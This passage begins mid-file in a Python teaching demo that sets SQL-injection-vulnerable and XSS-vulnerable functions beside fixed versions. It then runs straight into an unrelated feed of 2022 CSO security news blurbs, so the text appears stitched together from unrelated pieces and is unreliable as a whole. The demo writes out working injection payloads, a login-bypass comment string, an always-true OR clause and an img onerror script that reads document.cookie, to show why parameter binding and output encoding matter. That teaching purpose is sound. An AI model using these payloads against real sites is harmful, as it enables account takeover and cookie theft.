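    only ever be data. (A real login fetches the stored hash by username and
    verifies it with a constant-time compare rather than matching it in SQL.)"""
    query = "SELECT username FROM users WHERE username = ? AND password_hash = ?"
    return [row[0] for row in conn.execute(query, (username, password_hash))]


def render_bio_vulnerable(bio: str) -> str:
    """Interpolates user text straight into HTML: stored XSS."""
    return '<p class="bio">%s</p>' % bio


def render_bio_fixed(bio: str) -> str:
    """Escapes for an HTML text context. Attribute, URL and JavaScript contexts
    each need their own encoder; one escape function does not cover all of them."""
    return '<p class="bio">%s</p>' % html.escape(bio, quote=True)


def demo() -> dict:
    conn = make_db()
    bypass = "alice' --"          # comments out the password check
    dump_all = "' OR '1'='1"      # true for every row
    xss = "<img src=x onerror=alert(document.cookie)>"
    return {
        "vuln_bypass": login_vulnerable(conn, bypass, "wrong"),
        "fixed_bypass": login_fixed(conn, bypass, "wrong"),
        "vuln_dump": login_vulnerable(conn, dump_all, dump_all),
        "fixed_dump": login_fixed(conn, dump_all, dump_all),
        "vuln_html": render_bio_vulnerable(xss),
        "fixed_html": render_bio_fixed(xss),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The injection strings are the ones a scanner tries first, which is why they keep showing up in test reports: the fix is mechanical (bind parameters, context-aware output encoding) and the findings persist only where the vulnerable pattern is still being written.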
CSO.webp 2022-07-05 02:00:00 6 signs your IAM strategy is failing, and how to fix it (lien direct) Companies have been developing and executing identity and access management (IAM) strategies for decades. "It started with mainframe time sharing, so nothing is new," says Jay Bretzmann, program director for security products at IDC. Despite that long experience, there are still opportunities for mistakes, especially when companies are upgrading their IAM platforms to those that can better deal with modern IT deployments.Here are six ways to tell that a company's IAM strategy is failing.1. Users can't access their applications, but criminals can The primary goal of an IAM platform is to allow legitimate users to access the resources that they need, while keeping out the bad guys. If the opposite is happening, then something is wrong. According to the latest Verizon Data Breach Incident Report, stolen credentials were the most common attack method last year, involved in half of all breaches and in over 80% of web application breaches.To read this article in full, please click here Data Breach
CSO.webp 2022-07-05 02:00:00 LockBit explained: How it has become the most popular ransomware (direct link) LockBit is one of the most prominent ransomware-as-a-service (RaaS) operations that has targeted organizations over the past several years. Since its launch in 2019, LockBit has constantly evolved, seeing unprecedented growth recently driven by other ransomware gangs disbanding. The LockBit creators sell access to the ransomware program and its infrastructure to third-party cybercriminals known as affiliates, who break into networks and deploy it on systems for a cut of up to 75% of the money paid by victims in ransoms. Like most similar RaaS gangs, LockBit engages in double extortion tactics where its affiliates also exfiltrate data out of victim organizations and threaten to publish it online. To read this article in full, please click here Ransomware
CSO.webp 2022-07-04 05:22:00 Asia could be placing all the wrong cybersecurity bets (direct link) Over two-thirds (69%) of security leaders in Asia are confident about their organization's cybersecurity resilience, even as 48% also admit that there is still room for improvement, a new joint study by Microsoft and risk advisory firm Marsh has found. The Asian edition of The State of Cyber Resilience report, which had over 660 participants, including CEOs, CISOs, and risk managers, revealed that companies in Asia have experienced a far higher number of privacy breaches (28%) and denial of service attacks (21%) as compared to their global peers (18% and 14% respectively). Companies in Asia perceived privacy breaches or the loss of data as their top security concerns, while globally ransomware was observed as the biggest concern among organizations. As such, data loss is a critical concern that needs to be addressed and factored into cyber-risk management strategies, the report said. To read this article in full, please click here Ransomware Guideline
CSO.webp 2022-07-04 02:00:00 11 top cloud security threats (direct link) Identity and access issues topped the list of concerns of IT pros in the Cloud Security Alliance's annual Top Threats to Cloud Computing: The Pandemic 11 report released earlier this month. "Data breaches and data loss were the top concerns last year," says CSA Global Vice President of Research John Yeoh. "This year, they weren't even in the top 11." "What that tells me is the cloud customer is getting a lot smarter," Yeoh continues. "They're getting away from worrying about end results (a data breach or loss is an end result) and looking at the causes of those results (data access, misconfigurations, insecure applications) and taking control of them." To read this article in full, please click here Data Breach Threat
CSO.webp 2022-06-30 09:51:00 Google Cloud previews advanced new API security features (direct link) Google Cloud's API security is getting a facelift, the company announced Thursday: a new Advanced API Security framework will help users identify potential threats, weed out bot traffic and identify data breaches caused by API misconfigurations or attacks. Advanced API Security is an outgrowth of the company's 2016 acquisition of Apigee, which became part of Google in a $625 million deal. According to Google, the new system allows users to dig more deeply into API traffic to detect unusual patterns, which may be signs of an exploit in progress. To read this article in full, please click here
CSO.webp 2022-06-30 02:00:00 How you handle independent contractors may determine your insider threat risk (direct link) If one were to build a Venn diagram comparing the onboarding, educating, supervising, and offboarding of staff versus contract workers, the areas of difference might offer a surprise. In this case, surprises aren't what a CISO wants to encounter. Thus, such a diagram, as part of the insider risk threat management program, highlights the delta between the two types of workers and how they are handled. The concept of core and context when it comes to separating the duties of the full-time-equivalent workforce into staff and independent contractors has long been an ongoing challenge for every enterprise and small- to medium-sized business. Add to the mix the contracted service offerings -- for example, a managed security service provider -- and entities find themselves handing the keys to the kingdom over to a third party to handle tasks at hand. On top of that, the past two-plus years have caused many an entity to undergo a momentous change in how employees and independent contractors engage, with a noted influx in the remote work option. To read this article in full, please click here Threat
CSO.webp 2022-06-30 02:00:00 Key takeaways from CSA's SaaS Governance Best Practices guide (direct link) SaaS governance and security are gaining attention among IT and security leaders. This is good, given that organizations are using exponentially more software-as-a-service (SaaS) than infrastructure-as-a-service (IaaS) offerings. Large enterprises are using upwards of 200 different SaaS offerings, compared to two or three IaaS providers, and only about 30% of organizations have any sort of SaaS security solutions in place. Despite the pervasive use of SaaS, it is overwhelmingly ungoverned, with little insight into use, data storage or access control. That's why the Cloud Security Alliance (CSA) created the SaaS Governance Best Practices for Cloud Customers whitepaper, for which I was honored to serve as co-lead. These are some of the key security takeaways from the SaaS governance best practices guidance. To read this article in full, please click here Guideline
CSO.webp 2022-06-29 16:25:00 SolarWinds creates new software build system in wake of Sunburst attack (direct link) SolarWinds became the poster child for attacks on software supply chains last year when a group of threat actors injected malicious code known as Sunburst into the company's software development system. It was subsequently distributed through an upgrade to its Orion product to thousands of government and enterprise customers worldwide. SolarWinds learned from the experience and has introduced new software development practices and technology to strengthen the integrity of its build environment. It includes what SolarWinds says is the first-of-its-kind “parallel build” process, where the software development takes place through multiple highly secure duplicate paths to establish a basis for integrity checks. To read this article in full, please click here Threat SolarWinds
CSO.webp 2022-06-29 12:52:00 Google Cloud gets new built-in security features (direct link) Google has announced that Google Cloud users will have access to two new security features, namely native integration with the MITRE ATT&CK threat classification and response framework and baked-in protection against DDoS attacks. Cloud Armor is Google's brand name for its DDoS mitigation and web application firewall service. It replicates many of the techniques used in traditionally structured DDoS protection systems, including per-client rate limiting, CAPTCHAs to help weed out bot requests, and machine learning to counteract Layer 7 attacks. MITRE inclusion allows users to map Google Cloud's built-in security controls onto the MITRE ATT&CK rubric of threat classification and response planning, letting users automate certain types of security response. To read this article in full, please click here Threat
CSO.webp 2022-06-29 12:36:00 Sysdig Secure update adds ability to stop container attacks at runtime (direct link) Container and cloud security company Sysdig has announced a new capability, Drift Control, designed to detect and prevent container attacks at runtime. Drift Control will function as part of Sysdig Secure, built to detect vulnerabilities in containers. Sysdig Secure is a component in Sysdig's container intelligence platform, which includes several container-oriented security applications. Aiming to detect, prevent and speed incident response for containers that were modified in production, also known as container drifts, Drift Control offers the ability to close "dangerous security gaps" created by deviations from the trusted original container. To read this article in full, please click here
CSO.webp 2022-06-29 08:42:00 BrandPost: Four Key Ways CISOs can Strengthen OT Security (direct link) The past decade has seen an increase in the number of operational technology (OT) attacks and their impact on organizations. Fortinet recently released its 2022 State of Operational Technology and Cybersecurity Report, revealing that 93% of OT organizations experienced one intrusion in the past year and 78% of them experienced more than three intrusions. The survey also found that CISOs and business leaders consider OT security a top concern. Outlined below are steps leaders can take to improve their OT security posture to decrease the risk of threats and keep up with bad actors. To read this article in full, please click here Threat Guideline
CSO.webp 2022-06-29 02:00:00 Why more zero-day vulnerabilities are being found in the wild (direct link) The number of zero-days exploited in the wild has been high over the past year and a half, with different kinds of actors using them. These vulnerabilities, which are unknown to the software maker, are leveraged by both state-sponsored groups and ransomware gangs. During the first half of this year, Google Project Zero counted almost 20 zero-days, most of which target products built by Microsoft, Apple and Google, with browsers and operating systems taking up large chunks. In addition, a critical remote code execution vulnerability was found in Atlassian's Confluence Server, which continues to be exploited. But in 2021, the number of in-the-wild zero-days was even higher. Project Zero found 58 vulnerabilities, while Mandiant detected 80, more than double the 2020 figure. To read this article in full, please click here Ransomware Vulnerability
CSO.webp 2022-06-29 02:00:00 How and why threat actors target Microsoft Active Directory (direct link) Microsoft Active Directory debuted 22 years ago. In the computer age, that's old technology. Threat actors like old technology because it often has legacy code or processes that are not secured to modern standards, or organizations have not kept up with patches and recommended settings. Derek Melber, chief technology and security strategist for Tenable, discussed Active Directory risks at this year's RSA conference. Attackers target domains. If they see a device joined to Active Directory, they will continue with the attack. If they don't see a domain-joined machine, they will go on to another workstation. Below are some examples of how attackers can exploit legacy Active Directory vulnerabilities. To read this article in full, please click here Threat
CSO.webp 2022-06-28 08:47:00 Russian DDoS attack on Lithuania was planned on Telegram, Flashpoint says (direct link) Cyberattacks on the Lithuanian government and private institutions conducted by the Russian cybercollective Killnet, and the group's possible collaboration with the Conti hacking gang, were shared on the Telegram messaging service ahead of a major DDoS attack Monday, according to cybersecurity company Flashpoint. Multiple attacks on Lithuanian entities have been claimed by Killnet on its Telegram channel "WE ARE KILLNET," in response to Lithuania's June 18 restrictions of trade routes with Russia. A Flashpoint blog post confirms that Killnet warned about the attacks on the Telegram channel, highlighting the cloud-based instant messaging platform's use as a popular communication channel for threat actors. To read this article in full, please click here Threat
CSO.webp 2022-06-28 05:00:00 Microsoft's Defending Ukraine report offers fresh details on digital conflict and disinformation (direct link) Last week Microsoft published an in-depth examination of the early cyber lessons learned from the war in Ukraine, offering fresh insight into the scope of Russia's malicious digital activities and new details about the sophisticated and widespread Russian foreign influence operations surrounding the war. Microsoft has been uniquely positioned to observe the digital landscape in Ukraine since Russia invaded on February 24, and even before then. To read this article in full, please click here
Last update at: 2024-04-29 18:08:54